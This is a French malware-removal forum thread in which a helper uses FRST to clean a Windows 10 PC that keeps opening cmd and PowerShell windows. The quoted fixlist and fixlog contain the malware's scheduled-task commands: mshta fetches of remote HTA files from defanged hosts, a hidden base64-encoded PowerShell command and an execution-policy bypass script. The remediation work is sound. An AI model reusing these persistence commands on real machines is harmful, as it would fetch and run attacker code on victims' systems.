Exécution seule de la fenêtre cmd et powershell [résolu]

[cbsgc]

Bonjour.
j'ai un problème sur mon Windows 10, après chaque branchement du secteur pour rechargement de la batterie, je reçois des fenêtres (noir) cmd et une autre fenêtre bleu powershell.
Une aide comment les réparer si c'est possible, vous trouverez ci dessous les liens des rapports de FRST:

https://pjjoint.malekal.com/files.php?i ... 2e13h5p9o8
https://pjjoint.malekal.com/files.php?i ... 10f8k13y12
https://pjjoint.malekal.com/files.php?i ... u13m8m5o14

[Malekal_morte]

Salut,


Zip ces deux fichiers :

C:\Users\chaoui_s\AppData\Roaming\MicrosoftWin.exe
C:\Users\chaoui_s\AppData\Roaming\Microsoft\del.ps1

Envoie le zip ici en pièce jointe.

~~


Voici la correction à effectuer avec FRST. Tu peux t'aider de cette Voici la correction à effectuer avec FRST. Tu peux t'aider de cette #fix note explicative avec des captures d'écran.
Relance FRST puis sur ton clavier appuyer sur la touche CTRL + Y.
Le bloc-note va s'ouvrir, copie/colle ceci.

Code : Tout sélectionner

Start:
CloseProcesses:
CreateRestorePoint:
Task: {E0C6D0F5-D3FA-48CE-B0B5-95F12EEC4656} - System32\Tasks\Optimize Start Menu Cache Files-S-3-5-21-2236678155-433529325-1142214968-1137 => C:\Windows\System32\cmd.exe /c mshta hxxp://asq.r77vh0.pw/win/checking.hta <==== ATTENTION
Task: {C1B7D4BA-7752-4B4E-AFD2-F3FA573E263B} - System32\Tasks\Optimize Start Menu Cache Files-S-3-5-21-2236678155-433529325-1142314968-1037 => C:\Windows\System32\cmd.exe /c mshta hxxp://185.10.68.147/win/checking.hta <==== ATTENTION
Task: {8C928C27-50A2-4C96-ACB2-4AEF2ED5CEB4} - System32\Tasks\Optimize Start Menu Cache Files-S-3-5-21-2236678155-433529325-1142214968-1138 => C:\Windows\System32\cmd.exe /c mshta hxxps://asq.d6shiiwz.pw/win/hssl/d6.hta <==== ATTENTION
Task: {EFBA38B9-3797-4630-8191-6CD673D975FF} - System32\Tasks\Update Shell => powershell -w 1  -e aQBlAHgAIAAkACgARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACAASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAYwByACAALQBOAGEAbQBlACAAZAAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwB0AG8AcAApAC4AZAA=
Task: {B1670E5B-B39C-41A9-9D93-1A0D32DFF6F8} - System32\Tasks\Optimize Start Menu Cache Files-S-3-5-21-2236678155-433529325-1142214968-1237 => C:\Windows\System32\cmd.exe /c powershell -exec bypass C:\Users\chaoui_s\AppData\Roaming\Microsoft\del.ps1 <==== ATTENTION
Task: {217EBF5F-9F59-4FF8-A55F-CCE8D9DA58AF} - System32\Tasks\MicrosoftWin.exe => powershell start C:\Users\chaoui_s\AppData\Roaming\MicrosoftWin.exe
2020-01-13 11:57 - 2020-01-13 11:57 - 000038912 _____ () C:\Users\chaoui_s\AppData\Roaming\MicrosoftWin.exe
2020-04-19 22:37 - 2020-04-23 11:14 - 000001907 _____ () C:\Users\chaoui_s\AppData\Roaming\Microsoft\del.ps1
RemoveProxy:
Hosts:
Reboot:
End:

Ferme le bloc-note, retourne sur FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire et automatique.
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.

Redémarre l'ordinateur.
(L'ordinateur peut redémarrer tout seul, si le rapport de correction ne s'ouvre pas, cherche un fichier fixlog.txt qui se trouve dans le même dossier que FRST)

[cbsgc]

Salut.
merci, j'ai fait la manipulation, ci dessous le contenu du fichier Fixlog:

Résultats de correction de Farbar Recovery Scan Tool (x64) Version: 22-04-2020
Exécuté par chaoui_s (23-04-2020 17:28:41) Run:1
Exécuté depuis C:\Users\chaoui_s\Desktop
Profils chargés: chaoui_s (Profils disponibles: chaoui_s & ALOCAL & Administrateur)
Mode d'amorçage: Normal
==============================================

fixlist contenu:
*****************
Start:
CloseProcesses:
CreateRestorePoint:
Task: {E0C6D0F5-D3FA-48CE-B0B5-95F12EEC4656} - System32\Tasks\Optimize Start Menu Cache Files-S-3-5-21-2236678155-433529325-1142214968-1137 => C:\Windows\System32\cmd.exe /c mshta hxxp://asq.r77vh0.pw/win/checking.hta <==== ATTENTION
Task: {C1B7D4BA-7752-4B4E-AFD2-F3FA573E263B} - System32\Tasks\Optimize Start Menu Cache Files-S-3-5-21-2236678155-433529325-1142314968-1037 => C:\Windows\System32\cmd.exe /c mshta hxxp://185.10.68.147/win/checking.hta <==== ATTENTION
Task: {8C928C27-50A2-4C96-ACB2-4AEF2ED5CEB4} - System32\Tasks\Optimize Start Menu Cache Files-S-3-5-21-2236678155-433529325-1142214968-1138 => C:\Windows\System32\cmd.exe /c mshta hxxps://asq.d6shiiwz.pw/win/hssl/d6.hta <==== ATTENTION
Task: {EFBA38B9-3797-4630-8191-6CD673D975FF} - System32\Tasks\Update Shell => powershell -w 1 -e aQBlAHgAIAAkACgARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACAASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAYwByACAALQBOAGEAbQBlACAAZAAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwB0AG8AcAApAC4AZAA=
Task: {B1670E5B-B39C-41A9-9D93-1A0D32DFF6F8} - System32\Tasks\Optimize Start Menu Cache Files-S-3-5-21-2236678155-433529325-1142214968-1237 => C:\Windows\System32\cmd.exe /c powershell -exec bypass C:\Users\chaoui_s\AppData\Roaming\Microsoft\del.ps1 <==== ATTENTION
Task: {217EBF5F-9F59-4FF8-A55F-CCE8D9DA58AF} - System32\Tasks\MicrosoftWin.exe => powershell start C:\Users\chaoui_s\AppData\Roaming\MicrosoftWin.exe
2020-01-13 11:57 - 2020-01-13 11:57 - 000038912 _____ () C:\Users\chaoui_s\AppData\Roaming\MicrosoftWin.exe
2020-04-19 22:37 - 2020-04-23 11:14 - 000001907 _____ () C:\Users\chaoui_s\AppData\Roaming\Microsoft\del.ps1
RemoveProxy:
Hosts:
Reboot:
End:
*****************

Processus fermé avec succès.
Erreur: (0) Impossible de créer un point de restauration.
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E0C6D0F5-D3FA-48CE-B0B5-95F12EEC4656}" => non trouvé(e)
C:\WINDOWS\System32\Tasks\Optimize Start Menu Cache Files-S-3-5-21-2236678155-433529325-1142214968-1137 => déplacé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Optimize Start Menu Cache Files-S-3-5-21-2236678155-433529325-1142214968-1137" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C1B7D4BA-7752-4B4E-AFD2-F3FA573E263B}" => non trouvé(e)
C:\WINDOWS\System32\Tasks\Optimize Start Menu Cache Files-S-3-5-21-2236678155-433529325-1142314968-1037 => déplacé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Optimize Start Menu Cache Files-S-3-5-21-2236678155-433529325-1142314968-1037" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{8C928C27-50A2-4C96-ACB2-4AEF2ED5CEB4}" => non trouvé(e)
C:\WINDOWS\System32\Tasks\Optimize Start Menu Cache Files-S-3-5-21-2236678155-433529325-1142214968-1138 => déplacé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Optimize Start Menu Cache Files-S-3-5-21-2236678155-433529325-1142214968-1138" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{EFBA38B9-3797-4630-8191-6CD673D975FF}" => non trouvé(e)
"C:\WINDOWS\System32\Tasks\Update Shell" => non trouvé(e)
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Update Shell" => non trouvé(e)
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B1670E5B-B39C-41A9-9D93-1A0D32DFF6F8}" => non trouvé(e)
C:\WINDOWS\System32\Tasks\Optimize Start Menu Cache Files-S-3-5-21-2236678155-433529325-1142214968-1237 => déplacé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Optimize Start Menu Cache Files-S-3-5-21-2236678155-433529325-1142214968-1237" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{217EBF5F-9F59-4FF8-A55F-CCE8D9DA58AF}" => non trouvé(e)
"C:\WINDOWS\System32\Tasks\MicrosoftWin.exe" => non trouvé(e)
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\MicrosoftWin.exe" => non trouvé(e)
"C:\Users\chaoui_s\AppData\Roaming\MicrosoftWin.exe" => non trouvé(e)
C:\Users\chaoui_s\AppData\Roaming\Microsoft\del.ps1 => déplacé(es) avec succès

========= RemoveProxy: =========

HKU\S-1-5-21-2888348644-2063401734-1411565189-2332\SOFTWARE\Policies\Microsoft\Internet Explorer => supprimé(es) avec succès
"HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => supprimé(es) avec succès
"HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => supprimé(es) avec succès
"HKU\S-1-5-21-2888348644-2063401734-1411565189-2332\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => supprimé(es) avec succès
"HKU\S-1-5-21-2888348644-2063401734-1411565189-2332\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => supprimé(es) avec succès


========= Fin de RemoveProxy: =========

C:\Windows\System32\Drivers\etc\hosts => déplacé(es) avec succès
Hosts restauré(es) avec succès.


Le système a dû redémarrer.

==== Fin de Fixlog 17:28:46 ====

[Malekal_morte]

Merci pour les fichiers =)

Fais un scan en ligne avec NOD32 puis enregistre le rapport. Envoie le sur https://pjjoint.malekal.com/ et donne le lien ici.


Change tes mots de passe et suis les instructions pour la bonne conduite pour ne plus te faire infecter.

[cbsgc]

Salut.
après l'analyse avec eset en ligne, vous trouverez ci dessous le lien du rapport:
https://pjjoint.malekal.com/files.php?i ... 5s15e12r12

merci.

[Malekal_morte]

Ca semble correct.

Change bien tous tes mots de passe,

Pour éviter les virus, il faut savoir comment les pirates s'y prennent pour infecter les ordinateurs : Comment les virus informatiques sont distribués
Enfin pour protéger ton PC : Comment protéger son PC des virus et des pirates ?
Tu peux améliorer les protections et sécurité de Windows en suivant ces indications :

[cbsgc]

Salut.
merci beaucoup, exactement ça semble correct, je ne reçois plus des ces fenêtres cmd depuis que j'ai lancé la réparation avec FRST.

[Malekal_morte]

Parfait bon WE à toi !
Tu peux supprimer le dossier C:\FRST